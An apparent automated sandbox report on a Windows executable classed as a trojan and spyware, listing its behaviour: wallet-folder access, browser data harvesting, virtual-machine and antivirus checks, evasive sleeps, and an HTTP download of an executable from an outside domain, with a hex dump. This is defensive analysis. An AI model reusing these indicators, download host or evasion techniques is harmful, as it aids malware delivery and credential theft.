Play interactive tour

Edit tour

Windows Analysis Report nE0BePfCtd.exe

Overview

General Information

Sample Name:	nE0BePfCtd.exe
Analysis ID:	470924
MD5:	24d513394ee068f066ccbd604f4f718a
SHA1:	656f25c0fe6fec97a15216c457c79ad7ee2ea832
SHA256:	39a9af2e4dacff39613bf2e27af27ca9756c98e178d082337a28480c8bfcb1b2
Tags:	exe
Infos:
Most interesting Screenshot:

Detection

Score:	72
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Tries to steal Crypto Currency Wallets

Connects to many ports of the same IP (likely port scanning)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal browser information (history, passwords, etc)

Queries the volume information (name, serial number etc) of a device

May sleep (evasive loops) to hinder dynamic analysis

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Internet Provider seen in connection with other malware

HTTP GET or POST without a user agent

Downloads executable code via HTTP

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Sample file is different than original file name gathered from version info

Drops PE files

Detected TCP or UDP traffic on non-standard ports

Binary contains a suspicious time stamp

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Classification

Process Tree

System is w10x64

nE0BePfCtd.exe (PID: 6404 cmdline: 'C:\Users\user\Desktop\nE0BePfCtd.exe' MD5: 24D513394EE068F066CCBD604F4F718A)

cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: nE0BePfCtd.exe

ReversingLabs: Detection: 15%

Source: nE0BePfCtd.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: clrjit.pdb source: nE0BePfCtd.exe, 00000000.00000003.235977040.000000001B380000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Alexx\Desktop\QWER\DeviceCredentialDeployment\bin\Release\Secured\AccessibilityImprovements.pdb source: nE0BePfCtd.exe

Networking:

Connects to many ports of the same IP (likely port scanning)

Show sources

Source: global traffic

TCP traffic: 159.69.210.57 ports 1,2,3,4,7,31724

Source: Joe Sandbox View

ASN Name: HETZNER-ASDE HETZNER-ASDE

Source: global traffic

HTTP traffic detected: GET /autorun.exe HTTP/1.1Host: swretjhwrtj.gqConnection: Keep-Alive

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 24 Aug 2021 17:39:24 GMTContent-Type: application/x-msdos-programContent-Length: 216064Connection: keep-alivelast-modified: Tue, 24 Aug 2021 13:47:07 GMTetag: "34c00-5ca4e5e9adae0"Cache-Control: max-age=14400CF-Cache-Status: HITAge: 3854Accept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=J8tKHgxTth4ePxaHOYf4JpqFuX3NiTWLO9XuY6WbWQ%2BVjQfXj9xCiloYmLgIeO7yT1P%2BkYDW3qK92Lz6X%2BbKHtUlnLsGvy0nClUqgP0hIov8iDEEG0j%2FPNiNXTq6lhrZsQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 683e5c1fe8c64a92-FRAalt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9b 36 d3 9e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 9c 01 00 00 ac 01 00 00 00 00 00 d6 a6 01 00 00 20 00 00 00 c0 01 00 00 00 40 00 00 20 00 00 00 04 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 03 00 00 04 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 a6 01 00 4f 00 00 00 00 c0 01 00 b4 a5 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 03 00 0c 00 00 00 68 a6 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 98 01 00 00 20 00 00 00 9c 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 b4 a5 01 00 00 c0 01 00 00 a8 01 00 00 a0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 03 00 00 04 00 00 00 48 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL60 @ @Oh H.text `.rsrc@@.relocH@B

Source: global traffic

TCP traffic: 192.168.2.3:49708 -> 159.69.210.57:31724

Source: nE0BePfCtd.exe	String found in binary or memory: http://epidemicsound.com/referral/cee...)
Source: nE0BePfCtd.exe	String found in binary or memory: http://secureteam.net/ErrorReporting.asmx
Source: nE0BePfCtd.exe	String found in binary or memory: http://secureteam.net/webservices/CreateErrorReport
Source: nE0BePfCtd.exe	String found in binary or memory: http://secureteam.net/webservices/T
Source: nE0BePfCtd.exe	String found in binary or memory: http://secureteam.net/webservices/TU
Source: nE0BePfCtd.exe	String found in binary or memory: http://secureteam.net/webservices/Y
Source: nE0BePfCtd.exe	String found in binary or memory: http://www.epidemicsound.com)
Source: tmp22F.tmp.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: nE0BePfCtd.exe	String found in binary or memory: https://bit.ly/3zr3UY1
Source: tmp22F.tmp.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: nE0BePfCtd.exe	String found in binary or memory: https://discord.com/invite/magicrust
Source: tmp22F.tmp.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: tmp22F.tmp.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: tmp22F.tmp.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: nE0BePfCtd.exe	String found in binary or memory: https://rustycloth.ru
Source: tmp22F.tmp.0.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: tmp22F.tmp.0.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: nE0BePfCtd.exe	String found in binary or memory: https://shop.magic-rust.ru
Source: nE0BePfCtd.exe	String found in binary or memory: https://vk.com/magic_manager
Source: nE0BePfCtd.exe	String found in binary or memory: https://vk.com/magicow
Source: nE0BePfCtd.exe	String found in binary or memory: https://vk.com/magicowrust
Source: nE0BePfCtd.exe	String found in binary or memory: https://vk.com/rustycloth
Source: tmp22F.tmp.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: nE0BePfCtd.exe	String found in binary or memory: https://www.instagram.com/dergidverih...

Source: unknown

DNS traffic detected: queries for: swretjhwrtj.gq

Source: global traffic

HTTP traffic detected: GET /autorun.exe HTTP/1.1Host: swretjhwrtj.gqConnection: Keep-Alive

Source: nE0BePfCtd.exe, 00000000.00000000.234138771.000000000063C000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameAccessibilityImprovements.exeT vs nE0BePfCtd.exe
Source: nE0BePfCtd.exe, 00000000.00000003.236316298.000000001B48B000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameclrjit.dllT vs nE0BePfCtd.exe
Source: nE0BePfCtd.exe	Binary or memory string: OriginalFilenameAccessibilityImprovements.exeT vs nE0BePfCtd.exe

Source: .dll.0.dr

Static PE information: Section: .reloc IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: .dll.0.dr

Static PE information: Section: .reloc IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: nE0BePfCtd.exe

ReversingLabs: Detection: 15%

Source: nE0BePfCtd.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\nE0BePfCtd.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\nE0BePfCtd.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\nE0BePfCtd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'

Source: C:\Users\user\Desktop\nE0BePfCtd.exe

File created: C:\Users\user\AppData\Local\Yandex

Jump to behavior

Source: C:\Users\user\Desktop\nE0BePfCtd.exe

File created: C:\Users\user\AppData\Local\Temp\78784e7d-1907-47d3-a181-cfdaca93dc14

Jump to behavior

Source: classification engine

Classification label: mal72.troj.spyw.evad.winEXE@1/30@3/2

Source: nE0BePfCtd.exe, u003cu0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u003e.cs	Security API names: System.Void System.IO.File::SetAccessControl(System.String,System.Security.AccessControl.FileSecurity)
Source: nE0BePfCtd.exe, u003cu0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u003e.cs	Security API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: nE0BePfCtd.exe, u003cu0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u003e.cs	Security API names: System.Security.AccessControl.FileSecurity System.IO.File::GetAccessControl(System.String)
Source: 0.0.nE0BePfCtd.exe.5b0000.0.unpack, u003cu0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u003e.cs	Security API names: System.Void System.IO.File::SetAccessControl(System.String,System.Security.AccessControl.FileSecurity)
Source: 0.0.nE0BePfCtd.exe.5b0000.0.unpack, u003cu0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u003e.cs	Security API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.0.nE0BePfCtd.exe.5b0000.0.unpack, u003cu0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u003e.cs	Security API names: System.Security.AccessControl.FileSecurity System.IO.File::GetAccessControl(System.String)

Source: C:\Users\user\Desktop\nE0BePfCtd.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll

Jump to behavior

Source: C:\Users\user\Desktop\nE0BePfCtd.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: nE0BePfCtd.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: nE0BePfCtd.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: nE0BePfCtd.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: clrjit.pdb source: nE0BePfCtd.exe, 00000000.00000003.235977040.000000001B380000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Alexx\Desktop\QWER\DeviceCredentialDeployment\bin\Release\Secured\AccessibilityImprovements.pdb source: nE0BePfCtd.exe

Source: nE0BePfCtd.exe

Static PE information: 0xF3E8F2D9 [Thu Sep 3 14:46:49 2099 UTC]

Source: initial sample

Static PE information: section name: .text entropy: 7.39879610147

Source: C:\Users\user\Desktop\nE0BePfCtd.exe

File created: C:\Users\user\AppData\Local\Temp\78784e7d-1907-47d3-a181-cfdaca93dc14\ .dll

Jump to dropped file

Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Show sources

Source: C:\Users\user\Desktop\nE0BePfCtd.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Show sources

Source: C:\Users\user\Desktop\nE0BePfCtd.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\nE0BePfCtd.exe

RDTSC instruction interceptor: First address: 00007FFB54321F0F second address: 00007FFB54321F90 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec eax 0x0000000a mov dword ptr [esp+28h], eax 0x0000000e dec eax 0x0000000f mov eax, dword ptr [esp+30h] 0x00000013 dec eax 0x00000014 mov ecx, dword ptr [esp+28h] 0x00000018 dec eax 0x00000019 sub ecx, eax 0x0000001b dec eax 0x0000001c mov eax, ecx 0x0000001e dec eax 0x0000001f add esp, 48h 0x00000022 ret 0x00000023 dec eax 0x00000024 mov dword ptr [00010326h], eax 0x0000002a mov dword ptr [esp+28h], 00000000h 0x00000032 jmp 00007F26ACE5EB3Ch 0x00000034 mov eax, dword ptr [esp+50h] 0x00000038 cmp dword ptr [esp+28h], eax 0x0000003c jnl 00007F26ACE5EB74h 0x0000003e rdtsc

Source: C:\Users\user\Desktop\nE0BePfCtd.exe TID: 6780	Thread sleep time: -1844674407370954s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe TID: 6780	Thread sleep time: -45000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\nE0BePfCtd.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Window / User API: threadDelayed 4581			Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Window / User API: threadDelayed 2680			Jump to behavior

Source: C:\Users\user\Desktop\nE0BePfCtd.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\nE0BePfCtd.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\nE0BePfCtd.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: tmp39A3.tmp.0.dr

Binary or memory string: IVHSHTCODIPNTGBCHMNVKPUAILXVVKFKXVQUNCFXTBCMTEBSWXPFTMDSDGZKIAUVKOEHSXZJBPMNMGEXTJPAOEMDPTHXRQCVOULRHOXNLLEVOYSUUHJKHUBLKPVUBOWNNNYIVERGXUJXWHARSIBRHIALJWVNJGCJFSWTYNFAKHFKMWIXKIPPQTBKLVLJABTXJJAUPFFIWTLSIBHYUFUKBTZFKZOHSTUPFMPQIOKLVDQRVIJQOGXFVCXVTHXYBRKEFKTAYEVEEJSDTODNKYUKIFEJTGSCOFEGJFXUFFTUDUGNPSDSFNCYGRUOKLHTZSRYLVFROHKDEBPBTMLYGSXGAHMMJCCAHNNTHTJYHYJSYCEYHNZYLYPZZRKQCBEKCIJOMVDKLIMUKHNBXCTWEOWAPIZLIROXKDWVWPAJXRXLLBZPLBODFKBOAAIGTICFSLICMIRMFQVAOXHGTZBMVNEYHPFMVMCIZMYUKDQAJPPKRYFMFYBBZZUDRZUAXHAETNILYTWGZWXKMVYVQPTHACYZNPNUTFPXHLZGFMCFPKGKXZBEMNDEMMSUCIJVEEZVVTNLALWSOOIQWNDNBYFXIMXSYSGIHDKBLTQNHGZBSABJNNCDWHLHGGLULQOHIPDWXBOSOZDGSJICPXZOMIEHQNITIKIXBHUHPYBVDEESQCONQTQTGDIDHFZLNHGHGBNMCJMHPFYAEFORSGPQVZXVNVTODPAYYBGVVJXOQSOXDEYRXFEQHHZXPIKKKAYEDXYKYANMXDXCYRRYSRYIHJTRQILRXNGCFCDERRCTAPDWXXOUTNWBDGRIXGZFWOPASEDDSDMQOIHQDMFZFHVAKVPOTYYQXENYUVBZWKYSVATRNDKTBQJKCBIUQOGVVRSKQRXEZOQAFWIQOTGVRLVGJCXQRXZRDCAHGTXVJAEUKUYANEGPRLWIUCPMSVVQZZMIBQKJKZRROZREPQAHYLRVAFUIGNUGSAQAMAZEHHGHFNSBQQBZOSFYEVJOWSCRJNDOYFYNDGPN

Source: C:\Users\user\Desktop\nE0BePfCtd.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\nE0BePfCtd.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Queries volume information: C:\Users\user\Desktop\nE0BePfCtd.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\nE0BePfCtd.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\nE0BePfCtd.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\Desktop\nE0BePfCtd.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information:

Tries to steal Crypto Currency Wallets

Show sources

Source: C:\Users\user\Desktop\nE0BePfCtd.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\			Jump to behavior
